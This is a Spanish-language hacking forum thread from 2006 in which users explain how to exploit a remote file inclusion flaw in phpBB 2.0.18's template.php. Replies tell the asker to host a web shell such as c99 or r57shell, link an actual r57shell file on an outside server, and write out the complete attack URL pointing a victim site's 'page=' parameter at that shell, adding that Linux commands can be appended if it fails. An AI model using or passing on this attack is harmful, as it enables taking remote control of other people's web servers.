hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
21 de Agosto de 2008, 09:03:16
Noticias: La segunda fase del torneo de matemáticas ya ha empezado!!
Para ver este enlace Registrate o Inicia Sesion
ver

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Explotar Vulnerabilidad Phpbb 2.0.18
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Explotar Vulnerabilidad Phpbb 2.0.18  (Leído 1075 veces)
H7x
Recien llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« : 07 de ſeptiembre de 2006, 12:08:34 »

Hola a todos.
Quisiera saber como puedo explotar esta vulnerabilidad para phpbb que encontre en security focus.

Para ver este enlace Registrate o Inicia Sesion
eh leido un poco sobre RFI y tengo algunos conceptos basicos.

la parte que no entiendo es que debo de poner en [attacker]

Para ver este enlace Registrate o Inicia Sesion[path_to_phpbb]/template.php?page=[attacker]

y si template.php es constante?

gracias
En línea
OzX
Visitante
« Respuesta #1 : 07 de ſeptiembre de 2006, 12:49:11 »

hola

Creo que template.php deve ser una sentencia constante, porque el mismo titulo dice que es para esa version ,  y esa version viene con template.php en toda esa version.. y es por eso que tenga es vulnerabilidad .. no creo que esa variable cambie.. solo que para esa version es fija, talves para otras version en donde salga template, diga index.php


en donde dice [path_to_phpbb] ahy que poner donde esta situado el foro ... todo esto varia segun la url de sitio ej:

Para ver este enlace Registrate o Inicia Sesion
www.ejample.co m/foro/

en path_to_phpbb tendria que ir foro..
osea

Para ver este enlace Registrate o Inicia Sesion
www.example.co m/foro/index.php?page=ataccker


en atack... talves tendria que poner una shell que tengas...

kedaria

Para ver este enlace Registrate o Inicia Sesion
www.example.co m/foro/index.php?page=direcciondelashell


si tengo algo mal.. que porfavor alguien diga, porque no me acuerdo muy bien de esto Cheesy ,
tengo que repasar¡¡¡
saludos
adios
« Última modificación: 07 de ſeptiembre de 2006, 12:51:49 por OzX » En línea
CiberPunk
NZ2
**
Desconectado Desconectado

Mensajes: 341


Asm & C/C++


Ver Perfil
« Respuesta #2 : 16 de ſeptiembre de 2006, 04:53:43 »

Hola, para empezar en [attacker] tienes que ubicar tu shell, ya sea la c99.txt o la r57shell.txt

esta es una shell:
Para ver este enlace Registrate o Inicia Sesion
http://svt.nukleon.us/tools/r57shell.txt


ahora en [path_to_phpbb] no hay que hacer nada, es solo para ubicar el directorio.

Ejemplo:


Para ver este enlace Registrate o Inicia Sesion
www.victima.co m/indice/subindice/template.php


ah entonces el path o directorio es: indice/subindice.

exacto ese el path, o script_path, etc...

Lo importante de esta vulnerabilidad es encontrar el "template.php".
Para que ?
Bien el template.php es un fichero que tiene un codigo vulnerable en la variable $include, ese codigo vulnerable se ubica en "page=" que permite tener el acceso o un lisatado del dominio. dependiendo de que comandos linuz uses.

Bien entonces al final simplemente are esto:


Para ver este enlace Registrate o Inicia Sesion
www.victima.co m/indice/subindice/template.php?page=http://svt.nukleon.us/tools/r57shell.txt?


Listo, si no funciona añadale algunos comandos de linux y veras que funciona

ahora no podria ser asi:


Para ver este enlace Registrate o Inicia Sesion
www.example.co m/foro/index.php?page=ataccker


por que te votaria directorio no encontrado o no mostraria nada

Greetings::::
« Última modificación: 16 de ſeptiembre de 2006, 04:55:12 por CiberPunk » En línea

if stdio.h then printf(" Hello World\n");
OzX
Visitante
« Respuesta #3 : 16 de ſeptiembre de 2006, 12:56:31 »

muy buena explicacion men, mas que la mia jejejejej
saludos Cheesy
adios¡¡¡¡
En línea
ricardo345
Recien llegado
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil
« Respuesta #4 : 23 de ſeptiembre de 2006, 10:57:59 »

podria ser así???

Para ver este enlace Registrate o Inicia Sesion

no me resulta, que anda mal??
En línea
OzX
Visitante
« Respuesta #5 : 24 de ſeptiembre de 2006, 12:07:38 »

fijate bien.. no ahy template

Para ver este enlace Registrate o Inicia Sesion

saludos
adios
En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online